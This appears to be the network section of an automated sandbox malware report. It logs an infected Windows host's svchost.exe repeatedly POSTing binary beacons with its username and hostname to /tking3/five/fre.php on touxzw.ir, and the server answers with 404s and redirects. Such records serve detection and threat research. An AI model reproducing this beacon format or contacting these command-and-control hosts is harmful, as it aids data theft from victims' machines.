Feb 24, 2025 08:40:31.680291891 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:32.429537058 CET	840	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5nonAcwbC9UyGlcQsRsdd7FxS9OaD%2FpKxRChhnfGcuD7Zwz5d54MJJYXH14BH1CprTzdj04kX8i3p6pWuUJr5HINsNFwvKckhnmsevTVx3RIhzX34jY%2FDiJoyY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcedc7dbe7287-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1899&rtt_var=949&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:32.621103048 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:32.626523972 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:33.347521067 CET	827	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:33 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tz1shfaFEJ8tFS8n7pSBBtUnEpDz8qrnxbb%2FlaxW1Yu1%2Fo4dlE%2BzfcMQYcVwrckZ5WFiY2ZtFsYK9eiWhbJj%2FW97p1c219vskeKOLW%2BSjNYWSeNde9Jzv3CBqVs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcee26b0932e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2012&rtt_var=1006&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:33.502810001 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:33.507917881 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:34.228279114 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:34 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQIttfokmQAIsAAPDE2bomjKvN8V0WOsob3J18Y6MwqjazcS8%2F%2BpUCO56xS6ixKBffTT68JLsf3aseVjwlGvZNuT2pOUc8s2NiSnnKcGhuMZ3BTN6vUfeHZrxhQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcee7eb5241af-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:34.372994900 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:34.380611897 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:35.152430058 CET	844	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YuV%2BC0eoRlM665QIiXg1M7fpBFQnvByRzHA6qRtzyyJx%2BzZdt%2BtrdjqQ0Lo9CPeJyBWr4UxWRqYJpz0bdxHkYE6%2FUhUsoK87uraZh8E3BMerWWsJqHIjd5uuK3Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dceed6d31c3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:35.299200058 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:35.304291010 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:35.962290049 CET	853	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWH9lHn4aM4sIYyDnp70XuCShOx7fJrql%2FT%2BCQ%2FSp%2FJ8y9KWOlo%2F2a%2BPWYPWIKmYLJhfcn7kne5mPmA1PeAzGung%2Bgj4cms9gkIDyMY2rpTTPeBxUSYOVK7i%2BD4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcef33e98439a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2313&min_rtt=2313&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:36.111707926 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:36.116918087 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:36.836858034 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:36 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ve7uzoHM%2FnJDK2AAxPMgPTsDcv1U9Uscd4dwrG95wQipSOlE9zAFhAVX7i3n3zu%2B8dPoVWyAMyrpW4%2F1p52mM8hLYg%2BaJ2mnnBDgO1qiCAcQiiWWucqdPEafs64%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcef84db98c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1773&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:36.992674112 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:36.997751951 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:37.738871098 CET	842	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4i4u6RiOiCrCN1hHDYMSstGcJAhKA7mIP6M%2F%2FdlFNy0irhBUL5Pb86eob%2Ff8yl2dXPxrezqHJykyCUXUSblc5Gudld31eTEXViAVUPgygmH61nHgZxls0q16rw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcefdb8489e05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:37.906234980 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:37.911289930 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:38.704355001 CET	836	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pI4RV5MRXDSYw1RujhaGppyfkdCrYSLzFKik6ZrlkI8DvozZWB45RfkpaOUUAj1dMk06ZEdnfnPCreMdcw2GPKP8EQEY1ZLFxK0M4Ig0bCSQR4HGQriyMY1muw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf0378ba6a4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:39.150405884 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:39.155461073 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:39.867889881 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:39 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eL%2BDemupMgSLf9o%2BySl98MCeApUDc7muCF1Spy18UPxL5ZYr8bE8K9tqgJBQ%2FVkMBFc1uF4d79vxr2GDG9aTEmXCnxQtt2zALFZBuH8CDoe9O%2BbfW%2BCLpkVsiN8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf0b3d320f59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1845&rtt_var=922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:40.038069963 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:40.047671080 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:41.836452007 CET	827	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:41 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYnbwyp5mXihhBQx7tIb8DZAswGx3hvOOzeV%2F%2BHKkpM2d6j0Vkqp0EOkqP%2FUlcHiKkNvnu%2FlD%2BdxBiM2obwB0dxJTyNUAcYoB63fJ4NAwt3jXvfWaD7FLE4ls5Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf10b84a439d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1723&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:41.989718914 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:41.994932890 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:42.803555965 CET	838	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73Rhfq6vT97COMokHdlDewiU3%2B1vl66Gr4soRMZFmgj0caOVHPymcbzUMw0WS9NdK5J8vUOoaCSbj32KNeWPTKo1dxRWITUDSa2FBL7aerXVGvaXYzorgbge9lE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf1d1c3f42f1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:42.972930908 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:42.978187084 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:43.783035040 CET	840	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sc2zhjrziLSSgSDSmhf5EOpZu%2FaxloF4CPyk3xcSxqQ94pMtUqBxQxYWUia9KrO95jmXyE2mDqD%2FgBsqc1tSt4d76AL7JpNNcyBulVMVtAWiZNrPNeEi8667DwY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf2338ac4299-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:43.943644047 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:43.948896885 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:44.708434105 CET	839	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GBCfjv7VgREng21oQNSi1ICpKx5qyk75t4fMszVwYrU5ufR33nUMyxYD1qKS5k%2Bp6lGQIpZJFygAl9x22tsYfi2kp9P3PE3mlQWWegOp15GQ7QwZhXXjC6gTSU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf292d830f60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3307&min_rtt=3307&rtt_var=1653&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:44.893898964 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:44.899169922 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:40:45.615396976 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:45 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AI%2F6wNryiwCOMA7yKpo1rxeBAQ3TuaBRmNnva%2FtNuH5OsgYuiSjI4eYrguSCvPAVkjfsBqXUgCM7SSUtCUmFxTQ7qijPF3InoGzS6B4xslx93alZnHnNOTjzblE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf2f2851ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1962&rtt_var=981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

